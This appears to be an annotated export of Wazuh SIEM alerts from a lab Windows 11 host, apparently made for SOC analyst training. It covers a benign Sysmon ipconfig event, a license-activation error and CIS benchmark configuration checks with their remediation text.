agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534991.2461732 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:49:08.3376108Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 344733 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:49:08.269
ProcessGuid: {94294ddc-bfe4-680a-af0c-000000000e00}
ProcessId: 9536
Image: C:\Windows\System32\ipconfig.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: IP Configuration Utility
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: ipconfig.exe
CommandLine: C:\WINDOWS\system32\ipconfig /renew
CurrentDirectory: C:\Windows\System32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B
ParentProcessGuid: {94294ddc-bfdb-680a-a50c-000000000e00}
ParentProcessId: 3372
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:49:08.269 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bfe4-680a-af0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9536 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\ipconfig.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: IP Configuration Utility No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: ipconfig.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\ipconfig /renew No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Windows\\System32\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=9C552FA02A37BA6EA511A7A571B1D05671CE9C5589A6E180337ADD7BC35E3D0B No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bfdb-680a-a50c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3372 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\cmd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: License activation (slui.exe) failed. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60646 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535004.2467193 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 8198 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:49:31.1240683Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2428 Incremental log record number – handy for timeline order.
data.win.system.processID: 4516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "License Activation (slui.exe) failed with the following error code:
hr=0x80004005
Command-line arguments:
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=NetworkAvailable No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not enumerate connected users on domain-joined computers' is set to 'Enabled'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not enumerate connected users on domain-joined computers' is set to 'Enabled'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not enumerate connected users on domain-joined computers' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.5'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.8.28.3'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2469515 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26257 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Do not enumerate connected users on domain-joined computers' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting prevents connected users from being enumerated on domain-joined computers. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: A malicious user could use this feature to gather account names of other users, that information could then be used in conjunction with other types of attacks such as guessing passwords or social engineering. The value of this countermeasure is small because a user with domain credentials could gather the same account information using other methods. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\System\Logon\Do not enumerate connected users on domain-joined computers. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Logon.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.8.28.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 2.2.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off app notifications on the lock screen' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.5'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.8.28.5'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2473013 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26259 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off app notifications on the lock screen' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to prevent app notifications from appearing on the lock screen. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: App notifications might display sensitive business or personal data. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\System\Logon\Turn off app notifications on the lock screen. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Logon.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.8.28.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 2.2.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off picture password sign-in' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '8.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.8.28.6'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2475885 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26260 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off picture password sign-in' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to control whether a domain user can sign in using a picture password. The recommended state for this setting is: Enabled. Note: If the picture password feature is permitted, the user's domain password is cached in the system vault when using it. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Picture passwords bypass the requirement for a typed complex password. In a shared work environment, a simple shoulder surf where someone observed the on-screen gestures would allow that person to gain access to the system without the need to know the complex password. Vertical monitor screens with an image are much more visible at a distance than horizontal key strokes, increasing the likelihood of a successful observation of the mouse gestures. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\System\Logon\Turn off picture password sign-in. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template CredentialProviders.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.8.28.6 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 8.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow network connectivity during connected-standby (plugged in)' is set to 'Disabled'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow network connectivity during connected-standby (plugged in)' is set to 'Disabled'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow network connectivity during connected-standby (plugged in)' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '8.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.8.34.6.2'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2479733 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26265 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Allow network connectivity during connected-standby (plugged in)' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to control the network connectivity state in standby on modern standby-capable systems. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Disabling this setting ensures that the computer will not be accessible to attackers over a WLAN network while left unattended, plugged in and in a sleep state. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\System\Power Management\Sleep Settings\Allow network connectivity during connected-standby (plugged in). Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Power.admx/adml that is included with the Microsoft Windows 10 Release 1607 & Server 2016 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.8.34.6.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 8.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Power\\PowerSettings\\f15576e8-98b7-4186-b944-eafa664402d9'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Enable Windows NTP Server' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '10.4'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'AU.8'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.8.53.1.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.4'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2483175 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26276 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Enable Windows NTP Server' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to specify whether the Windows NTP Server is enabled. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: The configuration of proper time synchronization is critically important in an enterprise managed environment both due to the sensitivity of Kerberos authentication timestamps and also to ensure accurate security logging. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\System\Windows Time Service\Time Providers\Enable Windows NTP Server. Note: This Group Policy path is provided by the Group Policy template W32Time.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.8.53.1.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 10.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: AU.8 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC7.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\W32Time\\TimeProviders\\NtpServer'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block launching Universal Windows apps with Windows Runtime API access from hosted content.' is set to 'Enabled'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block launching Universal Windows apps with Windows Runtime API access from hosted content.' is set to 'Enabled'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block launching Universal Windows apps with Windows Runtime API access from hosted content.' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.6.2'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['2.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535009.2486361 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26281 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Block launching Universal Windows apps with Windows Runtime API access from hosted content.' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting controls whether Microsoft Store apps with Windows Runtime API access directly from web content can be launched. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Blocking apps from the web with direct access to the Windows API can prevent malicious apps from being run on a system. Only system administrators should be installing approved applications. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\App runtime\Block launching Universal Windows apps with Windows Runtime API access from hosted content. Note: A reboot may be required after the setting is applied. Note #2: This Group Policy path may not exist by default. It is provided by the Group Policy template AppXRuntime.admx/adml that is included with the Microsoft Windows 10 RTM (Release 1507) Administrative Templates (or newer). Note #3: In older Microsoft Windows Administrative Templates, this setting was initially named Block launching Windows Store apps with Windows Runtime API access from hosted content., but it was renamed starting with the Windows 10 Release 1803 Administrative Templates Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.6.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 2.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Disallow Autoplay for non-volume devices' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
